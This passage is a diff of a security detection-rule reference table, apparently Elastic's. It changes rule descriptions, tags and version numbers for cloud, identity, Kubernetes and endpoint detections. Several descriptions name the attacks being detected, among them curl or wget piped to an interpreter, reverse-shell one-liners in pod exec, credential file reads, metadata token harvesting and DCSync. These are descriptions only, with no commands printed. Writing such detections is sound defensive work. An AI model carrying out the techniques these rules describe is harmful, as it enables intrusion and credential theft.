|Identifies Entra ID service principal sign-ins where the workload identity and source autonomous system number (ASN) together have not appeared in recent history. Attackers who obtain application secrets or tokens often authenticate from unfamiliar hosting providers, residential or VPN egress, or networks outside normal automation footprints, which can precede data access, lateral movement, or ransomware activity in the tenant. The detection emphasizes first-seen network context for non-interactive workload identities. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Sign-In Logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Initial Access], [Resources: Investigation Guide] |None |3 -|<> |Identifies when an application accesses SharePoint Online or OneDrive for Business for the first time in the tenant within a specified timeframe. This detects successful OAuth phishing campaigns, illicit consent grants, or compromised third-party applications gaining initial access to file storage. Adversaries often use malicious OAuth applications or phishing techniques to gain consent from users, allowing persistent access to organizational data repositories without traditional credential theft. |[Domain: Cloud], [Domain: Identity], [Domain: Storage], [Use Case: Identity and Access Audit], [Tactic: Collection], [Tactic: Initial Access], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Sign-in Logs], [Resources: Investigation Guide] |None |6 +|<> |Identifies when an application accesses SharePoint Online or OneDrive for Business for the first time in the tenant within a specified timeframe. This detects successful OAuth phishing campaigns, illicit consent grants, or compromised third-party applications gaining initial access to file storage. Adversaries often use malicious OAuth applications or phishing techniques to gain consent from users, allowing persistent access to organizational data repositories without traditional credential theft. |[Domain: Cloud], [Domain: Identity], [Domain: Storage], [Use Case: Identity and Access Audit], [Tactic: Collection], [Tactic: Initial Access], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Sign-in Logs], [Resources: Investigation Guide], [Rule Type: New Terms] |None |7 |<> |Identifies potential enumeration activity using AzureHound, SharpHound, or BloodHound across Microsoft cloud services. These tools are often used by red teamers and adversaries to map users, groups, roles, applications, and access relationships within Microsoft Entra ID (Azure AD) and Microsoft 365. |[Domain: Cloud], [Data Source: Azure], [Data Source: Azure Activity Logs], [Data Source: Graph API], [Data Source: Graph API Activity Logs], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Audit Logs], [Data Source: Microsoft Entra ID Sign-in Logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Discovery], [Resources: Investigation Guide] |None |4 @@ -1100,11 +1106,11 @@ and their rule type is `machine_learning`. |<> |Identifies potential brute-force attacks targeting user accounts by analyzing failed sign-in patterns in Microsoft Entra ID Sign-In Logs. This detection focuses on a high volume of failed interactive or non-interactive authentication attempts within a short time window, often indicative of password spraying, credential stuffing, or password guessing. Adversaries may use these techniques to gain unauthorized access to applications integrated with Entra ID or to compromise valid user accounts. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Entra ID], [Data Source: Entra ID Sign-in Logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide] |None |9 -|<> |Identifies rare instances of authentication requirements for Azure Entra ID principal users. An adversary with stolen credentials may attempt to authenticate with unusual authentication requirements, which is a rare event and may indicate an attempt to bypass conditional access policies (CAP) and multi-factor authentication (MFA) requirements. The authentication requirements specified may not be commonly used by the user based on their historical sign-in activity. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Sign-in Logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Initial Access], [Resources: Investigation Guide] |None |8 +|<> |Identifies rare instances of authentication methods for Microsoft Entra ID principal users. An adversary with stolen credentials may attempt to authenticate with an unusual method, which may indicate an attempt to bypass conditional access policies (CAP) and multi-factor authentication (MFA) requirements. The authentication method may not be commonly used by the user based on their historical sign-in activity. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Sign-in Logs], [Platform: Entra ID], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Initial Access], [Resources: Investigation Guide] |None |9 -|<> |Detects rare non-interactive sign-ins where an Entra ID client application authenticates on behalf of a principal user using an application (client) ID that is not commonly associated with that user's historical sign-in behavior. Adversaries with stolen credentials or OAuth tokens may abuse Entra ID–managed or first-party client IDs to perform on-behalf-of (OBO) authentication, blending into legitimate cloud traffic while avoiding traditional interactive sign-in flows. This technique is commonly observed in OAuth phishing, token theft, and access broker operations, and may precede lateral movement, persistence, or data access via Microsoft Graph or other cloud resources. The rule uses a New Terms approach to identify first-seen combinations of the UPN and Client ID within a defined history window, helping surface unexpected client usage that may indicate compromised identities, malicious automation, or unauthorized application impersonation. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Entra ID], [Data Source: Entra ID Sign-in], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Initial Access], [Resources: Investigation Guide] |None |8 +|<> |Detects rare non-interactive sign-ins where an Entra ID client application authenticates on behalf of a principal user using an application (client) ID that is not commonly associated with that user's historical sign-in behavior. Adversaries with stolen credentials or OAuth tokens may abuse Entra ID–managed or first-party client IDs to perform on-behalf-of (OBO) authentication, blending into legitimate cloud traffic while avoiding traditional interactive sign-in flows. This technique is commonly observed in OAuth phishing, token theft, and access broker operations, and may precede lateral movement, persistence, or data access via Microsoft Graph or other cloud resources. The rule uses a New Terms approach to identify first-seen combinations of the UPN and Client ID within a defined history window, helping surface unexpected client usage that may indicate compromised identities, malicious automation, or unauthorized application impersonation. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Entra ID], [Data Source: Entra ID Sign-in], [Platform: Entra ID], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Initial Access], [Resources: Investigation Guide] |None |9 -|<> |Identifies when a Microsoft Entra ID user signs in from a device that is not typically used by the user and is not managed, which may indicate potential compromise or unauthorized access attempts. This rule detects unusual sign-in activity by comparing the device used for the sign-in against the user's typical device usage patterns. Adversaries may create and register a new device to obtain a Primary Refresh Token (PRT) and maintain persistent access. |[Domain: Cloud], [Domain: Identity], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Sign-in Logs], [Resources: Investigation Guide] |None |3 +|<> |Identifies when a Microsoft Entra ID user signs in from a device that is not typically used by the user and is not managed, which may indicate potential compromise or unauthorized access attempts. This rule detects unusual sign-in activity by comparing the device used for the sign-in against the user's typical device usage patterns. Adversaries may create and register a new device to obtain a Primary Refresh Token (PRT) and maintain persistent access. |[Domain: Cloud], [Domain: Identity], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Sign-in Logs], [Platform: Entra ID], [Resources: Investigation Guide] |None |4 |<> |Identifies the use of dsquery.exe for domain trust discovery purposes. Adversaries may use this command-line utility to enumerate trust relationships that may be used for Lateral Movement opportunities in Windows multi-domain forest environments. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender XDR], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Crowdstrike] |None |215 @@ -1198,6 +1204,8 @@ and their rule type is `machine_learning`. |<> |Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Auditd Manager], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |216 +|<> |This rule detects when a file is downloaded by curl or wget, and piped to an interpreter. Attackers may use this technique to download and execute payloads for various malicious purposes, such as establishing persistence or exfiltrating data. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Command and Control], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |1 + |<> |Identifies file permission modifications in common writable directories by a non-root user. Adversaries often drop files or payloads into a writable directory and change permissions prior to execution. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |216 |<> |Identifies files written to the root of the Recycle Bin folder instead of subdirectories. Adversaries may place files in the root of the Recycle Bin in preparation for exfiltration or to evade defenses. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Data Source: Elastic Defend], [Rule Type: BBR], [Data Source: Elastic Endgame], [Data Source: Sysmon] |None |109 @@ -1218,7 +1226,7 @@ and their rule type is `machine_learning`. |<> |Identifies unusual files downloaded from outside the local network that have the potential to be abused for code execution. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Rule Type: BBR] |None |6 -|<> |Finder Sync plugins enable users to extend Finder’s functionality by modifying the user interface. Adversaries may abuse this feature by adding a rogue Finder Plugin to repeatedly execute malicious payloads for persistence. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |212 +|<> |Finder Sync plugins enable users to extend Finder’s functionality by modifying the user interface. Adversaries may abuse this feature by adding a rogue Finder Plugin to repeatedly execute malicious payloads for persistence. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |213 |<> |Detects a first occurrence event for a personal access token (PAT) not seen in the last 14 days. |[Domain: Cloud], [Use Case: Threat Detection], [Use Case: UEBA], [Tactic: Execution], [Rule Type: BBR], [Data Source: Github] |None |208 @@ -1240,7 +1248,9 @@ and their rule type is `machine_learning`. |<> |Detects a new user agent used for a GitHub user not previously seen in the last 14 days. |[Domain: Cloud], [Use Case: Threat Detection], [Use Case: UEBA], [Tactic: Initial Access], [Rule Type: BBR], [Data Source: Github] |None |207 -|<> |This rule detects the first time a principal calls AWS CloudFormation CreateStack, CreateStackSet or CreateStackInstances API. CloudFormation is used to create a collection of cloud resources called a stack, via a defined template file. An attacker with the appropriate privileges could leverage CloudFormation to create specific resources needed to further exploit the environment. This is a new terms rule that looks for the first instance of this behavior for a role or IAM user within a particular account. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: CloudFormation], [Use Case: Asset Visibility], [Tactic: Execution], [Resources: Investigation Guide] |None |8 +|<> |Identifies a successful SonicWall VPN- or WAN-zone administrator or remote-user login from a source IP that was not previously observed with the same user on the same appliance during the prior 14 days. This may indicate stolen credentials, compromised administrator access, or unauthorized remote access. |[Domain: Network], [Domain: Identity], [Use Case: Threat Detection], [Use Case: Identity and Access Audit], [Tactic: Initial Access], [Data Source: SonicWall Firewall Logs], [Rule Type: New Terms], [Resources: Investigation Guide] |None |1 + +|<> |This rule detects the first time a principal calls AWS CloudFormation CreateStack, CreateStackSet or CreateStackInstances API. CloudFormation is used to create a collection of cloud resources called a stack, via a defined template file. An attacker with the appropriate privileges could leverage CloudFormation to create specific resources needed to further exploit the environment. This is a new terms rule that looks for the first instance of this behavior for a role or IAM user within a particular account. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS CloudFormation], [Tactic: Execution], [Rule Type: New Terms], [Resources: Investigation Guide] |None |9 |<> |Detects the first time a Python process accesses sensitive credential files on a given host. This behavior may indicate post-exploitation credential theft via a malicious Python script, compromised dependency, or malicious model file deserialization. Legitimate Python processes do not typically access credential files such as SSH keys, AWS credentials, browser cookies, Kerberos tickets, or keychain databases, so a first occurrence is a strong indicator of compromise. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend], [Resources: Investigation Guide], [Domain: LLM] |None |2 @@ -1248,7 +1258,7 @@ and their rule type is `machine_learning`. |<> |Detects the first time a Python process spawns a shell on a given host. Malicious Python scripts, compromised dependencies, or model file deserialization can result in shell spawns that would not occur during normal workflows. Since legitimate Python processes rarely shell out to interactive shells, a first occurrence of this behavior on a host is a strong signal of potential compromise. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend], [Resources: Investigation Guide], [Domain: LLM] |None |2 -|<> |An adversary with access to a compromised AWS service such as an EC2 instance, Lambda function, or other service may attempt to leverage the compromised service to access secrets in AWS Secrets Manager. This rule looks for the first time a specific user identity has programmatically retrieved a secret value from Secrets Manager using the GetSecretValue action. This rule assumes that AWS services such as Lambda functions and EC2 instances are setup with IAM role's assigned that have the necessary permissions to access the secrets in Secrets Manager. An adversary with access to a compromised AWS service would rely on its' attached role to access the secrets in Secrets Manager. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS Secrets Manager], [Tactic: Credential Access], [Resources: Investigation Guide] |None |319 +|<> |An adversary with access to a compromised AWS service such as an EC2 instance, Lambda function, or other service may attempt to leverage the compromised service to access secrets in AWS Secrets Manager. This rule looks for the first time a specific user identity has programmatically retrieved a secret value from Secrets Manager using the GetSecretValue action. This rule assumes that AWS services such as Lambda functions and EC2 instances are setup with IAM role's assigned that have the necessary permissions to access the secrets in Secrets Manager. An adversary with access to a compromised AWS service would rely on its' attached role to access the secrets in Secrets Manager. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS Secrets Manager], [Tactic: Credential Access], [Rule Type: New Terms], [Resources: Investigation Guide] |None |320 |<> |This rule identifies when a User Account starts the Active Directory Replication Process for the first time. Attackers can use the DCSync technique to get credential information of individual accounts or the entire domain, thus compromising the entire domain. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Privilege Escalation], [Use Case: Active Directory Monitoring], [Data Source: Active Directory], [Resources: Investigation Guide], [Data Source: Windows Security Event Logs] |None |119 @@ -1326,6 +1336,8 @@ and their rule type is `machine_learning`. |<> |Identifies the deletion of a topic in Google Cloud Platform (GCP). In GCP, the publisher-subscriber relationship (Pub/Sub) is an asynchronous messaging service that decouples event-producing and event-processing services. A publisher application creates and sends messages to a topic. Deleting a topic can interrupt message flow in the Pub/Sub pipeline. |[Domain: Cloud], [Data Source: GCP], [Data Source: Google Cloud Platform], [Use Case: Log Auditing], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |109 +|<> |Detects a single identity listing Google Cloud Secret Manager secrets across many distinct projects in a short window. ListSecrets does not return secret values, but sweeping many projects is a common reconnaissance step before targeted AccessSecretVersion calls. Legitimate workloads typically list secrets within one project or a small set of projects; cross-project bursts from one user and source IP are uncommon outside security tooling or compromise. |[Domain: Cloud], [Data Source: GCP], [Data Source: Google Cloud Platform], [Data Source: GCP Audit Logs], [Use Case: Threat Detection], [Tactic: Discovery], [Resources: Investigation Guide], [Rule Type: ESQL], [Platform: GCP], [Service: GCP Secret Manager] |None |2 + |<> |Identifies when a new service account is created in Google Cloud Platform (GCP). A service account is a special type of account used by an application or a virtual machine (VM) instance, not a person. Applications use service accounts to make authorized API calls, authorized as either the service account itself, or as G Suite or Cloud Identity users through domain-wide delegation. If service accounts are not tracked and managed properly, they can present a security risk. An adversary may create a new service account to use during their operations in order to avoid using a standard user account and attempt to evade detection. |[Domain: Cloud], [Data Source: GCP], [Data Source: Google Cloud Platform], [Use Case: Identity and Access Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |109 |<> |Identifies when a service account is deleted in Google Cloud Platform (GCP). A service account is a special type of account used by an application or a virtual machine (VM) instance, not a person. Applications use service accounts to make authorized API calls, authorized as either the service account itself, or as G Suite or Cloud Identity users through domain-wide delegation. An adversary may delete a service account in order to disrupt their target's business operations. |[Domain: Cloud], [Data Source: GCP], [Data Source: Google Cloud Platform], [Use Case: Identity and Access Audit], [Tactic: Impact], [Resources: Investigation Guide] |None |108 @@ -1422,8 +1434,6 @@ and their rule type is `machine_learning`. |<> |Detects write operations performed by GKE service accounts against RBAC resources (Roles, ClusterRoles, RoleBindings, ClusterRoleBindings). Service accounts typically do not manage RBAC directly; this activity may indicate token abuse or unauthorized privilege escalation. |[Domain: Cloud], [Domain: Kubernetes], [Data Source: GCP], [Data Source: Google Cloud Platform], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Persistence], [Resources: Investigation Guide] |None |1 -|<> |Detects creation of a GKE service account token through the TokenRequest API by a non-system identity. TokenRequest allows programmatic minting of short-lived tokens for any service account the caller can create tokens for, without reading a mounted projected token from disk. Attackers with initial cluster access can abuse this API to obtain tokens for more privileged service accounts, pivot via Workload Identity to GCP APIs, or retain access after pod termination. Unlike filesystem token theft, TokenRequest activity is visible only in Kubernetes audit logs as create against the serviceaccounts/token subresource. |[Domain: Cloud], [Domain: Kubernetes], [Data Source: GCP], [Data Source: Google Cloud Platform], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide] |None |1 - |<> |Detects a request to attach a built-in kube-controller-manager service account to a pod running in the kube-system namespace on GKE. These service accounts are admin-equivalent and are not normally assigned to arbitrary pods. An attacker who can create pods in kube-system can abuse these tokens for cluster-wide privilege escalation. |[Domain: Cloud], [Domain: Kubernetes], [Data Source: GCP], [Data Source: Google Cloud Platform], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Privilege Escalation], [Resources: Investigation Guide] |None |1 |<> |Detects GKE service account or node identities invoking self-subject access or rules review APIs. Non-human identities rarely enumerate their own permissions outside known controllers; this can indicate stolen tokens probing effective RBAC. |[Domain: Cloud], [Domain: Kubernetes], [Data Source: GCP], [Data Source: Google Cloud Platform], [Use Case: Threat Detection], [Tactic: Discovery], [Resources: Investigation Guide] |None |1 @@ -1588,8 +1598,6 @@ and their rule type is `machine_learning`. |<> |Identifies when Internet Information Services (IIS) HTTP Logging is disabled on a server. An attacker with IIS server access via a webshell or other mechanism can disable HTTP Logging as an effective anti-forensics measure. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender XDR], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Crowdstrike] |None |318 -|<> |This rule detects outbound IPSEC NAT Traversal (NAT-T) tunnels established from an internal host to an external destination. IPSEC is a VPN technology that allows one system to talk to another using encrypted tunnels. NAT Traversal encapsulates IPSEC ESP traffic in UDP and, once a NAT device is detected, both peers float to UDP port 4500 for the tunnel data channel. The rule keys on this NAT-T signature, UDP traffic where both the source and destination port are 4500, from an internal source to an external destination, rather than on any UDP traffic to port 4500. This may be common on your network, but this technique is also used by threat actors to tunnel command and control or exfiltration traffic over the Internet to avoid detection. |[Tactic: Command and Control], [Domain: Endpoint], [Use Case: Threat Detection], [Data Source: PAN-OS], [Data Source: Network Traffic], [Data Source: pfSense], [Data Source: Zeek], [Resources: Investigation Guide] |None |112 - |<> |This rule monitors for the execution of commands that enable IPv4 and IPv6 forwarding on Linux systems. Enabling IP forwarding can be used to route network traffic between different network interfaces, potentially allowing attackers to pivot between networks, exfiltrate data, or establish command and control channels. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend], [Data Source: SentinelOne], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Crowdstrike] |None |108 |<> |The Debugger and SilentProcessExit registry keys can allow an adversary to intercept the execution of files, causing a different process to be executed. This functionality can be abused by an adversary to establish persistence. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender XDR], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |315 @@ -1620,13 +1628,13 @@ and their rule type is `machine_learning`. |<> |This rule detects the unpacking of an initramfs image using the "unmkinitramfs" command on Linux systems. The "unmkinitramfs" command is used to extract the contents of an initramfs image, which is used to boot the system. Attackers may use "unmkinitramfs" to unpack an initramfs image and modify its contents to include malicious code or backdoors, allowing them to maintain persistence on the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Auditd Manager], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |6 -|<> |Identifies when a specified inbound (ingress) rule is added or adjusted for a VPC security group in AWS EC2. This rule detects when a security group rule is added that allows traffic from any IP address or from a specific IP address to common remote access ports, such as 22 (SSH) or 3389 (RDP). Adversaries may add these rules to allow remote access to VPC instances from any location, increasing the attack surface and potentially exposing the instances to unauthorized access. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS EC2], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |7 +|<> |Identifies when a specified inbound (ingress) rule is added or adjusted for a VPC security group in AWS EC2. This rule detects when a security group rule is added that allows traffic from any IP address or from a specific IP address to common remote access ports, such as 22 (SSH) or 3389 (RDP). Adversaries may add these rules to allow remote access to VPC instances from any location, increasing the attack surface and potentially exposing the instances to unauthorized access. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS EC2], [Tactic: Defense Evasion], [Rule Type: Custom Query (KQL)], [Resources: Investigation Guide] |None |8 |<> |InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. Adversaries may use InstallUtil to proxy the execution of code through a trusted Windows utility. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Rule Type: BBR], [Data Source: Elastic Endgame], [Data Source: Windows Security Event Logs] |None |107 |<> |Identifies InstallUtil.exe making outbound network connections. This may indicate adversarial activity as InstallUtil is often leveraged by adversaries to execute code and evade detection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Data Source: Sysmon], [Resources: Investigation Guide], [Data Source: SentinelOne] |None |212 -|<> |Identifies the installation of custom Application Compatibility Shim databases. This Windows functionality has been abused by attackers to stealthily gain persistence and arbitrary code execution in legitimate Windows processes. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender XDR], [Data Source: SentinelOne], [Data Source: Elastic Endgame], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |315 +|<> |Identifies the installation of custom Application Compatibility Shim databases. This Windows functionality has been abused by attackers to stealthily gain persistence and arbitrary code execution in legitimate Windows processes. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender XDR], [Data Source: SentinelOne], [Data Source: Elastic Endgame], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |316 |<> |Identifies registry modifications related to the Windows Security Support Provider (SSP) configuration. Adversaries may abuse this to establish persistence in an environment. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender XDR], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |315 @@ -1716,8 +1724,6 @@ and their rule type is `machine_learning`. |<> |Detects the creation or modification of Kubernetes Roles or ClusterRoles that grant high-risk permissions, such as wildcard access or RBAC escalation verbs (e.g., bind, escalate, impersonate), which may enable privilege escalation or unauthorized access within the cluster. |[Data Source: Kubernetes], [Domain: Kubernetes], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Resources: Investigation Guide] |None |4 -|<> |This rule detects when a service account makes an unauthorized request for resources from the API server via an unusual user agent. Service accounts follow a very predictable pattern of behavior. A service account should never send an unauthorized request to the API server. This behavior is likely an indicator of compromise or of a problem within the cluster. An adversary may have gained access to credentials/tokens and this could be an attempt to access or create resources to facilitate further movement or execution within the cluster. |[Data Source: Kubernetes], [Domain: Kubernetes], [Use Case: Threat Detection], [Tactic: Discovery], [Resources: Investigation Guide] |None |12 - |<> |This rule monitors for the execution of curl or wget commands that directly access Kubernetes API endpoints, which may indicate an attempt to interact with Kubernetes resources in a potentially unauthorized manner. This technique is often used by adversaries to gather information about the Kubernetes environment, such as secrets, config maps, and other sensitive data, without using the official Kubernetes client tools such as "kubectl". |[Domain: Endpoint], [Domain: Container], [Domain: Kubernetes], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Discovery], [Data Source: Auditd Manager], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |2 |<> |Detects allowed updates to the pods/ephemeralcontainers subresource by a non-system identity. Ephemeral containers are commonly used for debugging (kubectl debug) but can also be abused to inject tooling into a running pod, access mounted secrets, and execute commands in the target pod context. Attackers with sufficient RBAC may use ephemeral containers to escalate privileges, move laterally, or establish persistence without deploying a new workload. |[Data Source: Kubernetes], [Domain: Kubernetes], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Execution], [Resources: Investigation Guide] |None |1 @@ -1742,13 +1748,13 @@ and their rule type is `machine_learning`. |<> |Detects successful Kubernetes pod creation requests using commonly abused base and debugging container images such as BusyBox, Alpine, Ubuntu, Netshoot, and network multitool variants. These images are frequently used by attackers to deploy short-lived or interactive "throwaway" containers for reconnaissance, payload staging, or command execution due to their small footprint or built-in tooling. |[Data Source: Kubernetes], [Domain: Kubernetes], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Defense Evasion], [Rule Type: BBR] |None |1 -|<> |Detects Kubernetes pod exec sessions whose decoded command line references cloud instance metadata endpoints or equivalent hostnames and paths. Workloads that reach the link-local metadata IP, AWS IMDS paths, GCP computeMetadata, Azure IMDS token routes, or encoded variants are often attempting to harvest role credentials, tokens, or instance attributes from the underlying node or hypervisor boundary. That behavior is high risk in multi-tenant and regulated environments because it can expose short-lived cloud credentials to code running inside a container. The rule classifies a coarse cloud target label and whether the string looks like credential retrieval versus lighter reconnaissance. |[Data Source: Kubernetes], [Domain: Kubernetes], [Domain: Cloud], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Execution], [Resources: Investigation Guide] |None |1 +|<> |Detects Kubernetes pod exec sessions whose decoded command line references cloud instance metadata endpoints or equivalent hostnames and paths. Workloads that reach the link-local metadata IP, AWS IMDS paths, GCP computeMetadata, Azure IMDS token routes, or encoded variants are often attempting to harvest role credentials, tokens, or instance attributes from the underlying node or hypervisor boundary. That behavior is high risk in multi-tenant and regulated environments because it can expose short-lived cloud credentials to code running inside a container. The rule classifies a coarse cloud target label and whether the string looks like credential retrieval versus lighter reconnaissance. |[Data Source: Kubernetes], [Data Source: Kubernetes API Server Audit Logs], [Domain: Kubernetes], [Platform: Kubernetes], [Domain: Cloud], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Execution], [Resources: Investigation Guide] |None |2 -|<> |Flags exec into a pod when the URL-decoded command payload resembles reverse-shell or bind-shell one-liners invocation patterns. Legitimate debug sessions sometimes use similar building blocks, but together these patterns align with post-exploitation interactive access and command-and-control. |[Data Source: Kubernetes], [Domain: Kubernetes], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Command and Control], [Resources: Investigation Guide] |None |1 +|<> |Flags exec into a pod when the URL-decoded command payload resembles reverse-shell or bind-shell one-liners invocation patterns. Legitimate debug sessions sometimes use similar building blocks, but together these patterns align with post-exploitation interactive access and command-and-control. |[Data Source: Kubernetes], [Data Source: Kubernetes API Server Audit Logs], [Domain: Kubernetes], [Platform: Kubernetes], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Command and Control], [Resources: Investigation Guide] |None |2 -|<> |Detects Kubernetes pod exec sessions whose decoded command line references high-value host or in-cluster paths and material types: mounted service account or platform tokens, kubelet and control-plane configuration areas, host identity stores, root dot-directories for cloud and kubeconfig material, common private-key and keystore extensions, process environment dumps, and configuration filenames suggestive of embedded secrets. The intent is to catch interactive or scripted access that often precedes lateral movement, privilege escalation, or credential theft from the node or workload boundary. A narrow exclusion ignores benign reads of resolv.conf. The query also labels an access_type bucket to speed triage without altering the detection predicates you validated. |[Data Source: Kubernetes], [Domain: Kubernetes], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Execution], [Resources: Investigation Guide] |None |1 +|<> |Detects Kubernetes pod exec sessions whose decoded command line references high-value host or in-cluster paths and material types: mounted service account or platform tokens, kubelet and control-plane configuration areas, host identity stores, root dot-directories for cloud and kubeconfig material, common private-key and keystore extensions, process environment dumps, and configuration filenames suggestive of embedded secrets. The intent is to catch interactive or scripted access that often precedes lateral movement, privilege escalation, or credential theft from the node or workload boundary. A narrow exclusion ignores benign reads of resolv.conf. The query also labels an access_type bucket to speed triage without altering the detection predicates you validated. |[Data Source: Kubernetes], [Data Source: Kubernetes API Server Audit Logs], [Domain: Kubernetes], [Platform: Kubernetes], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Execution], [Resources: Investigation Guide] |None |2 -|<> |Detects pod or attach exec API calls where the decoded request query implies **curl** or wget fetching an **https** URL. Attackers with permission to exec into workloads often run one-liners to stage tooling, pull scripts or binaries, or exfiltrate data over HTTPS—activity that should be rare compared to shells, debuggers, or expected health checks. The rule decodes the audit requestURI, 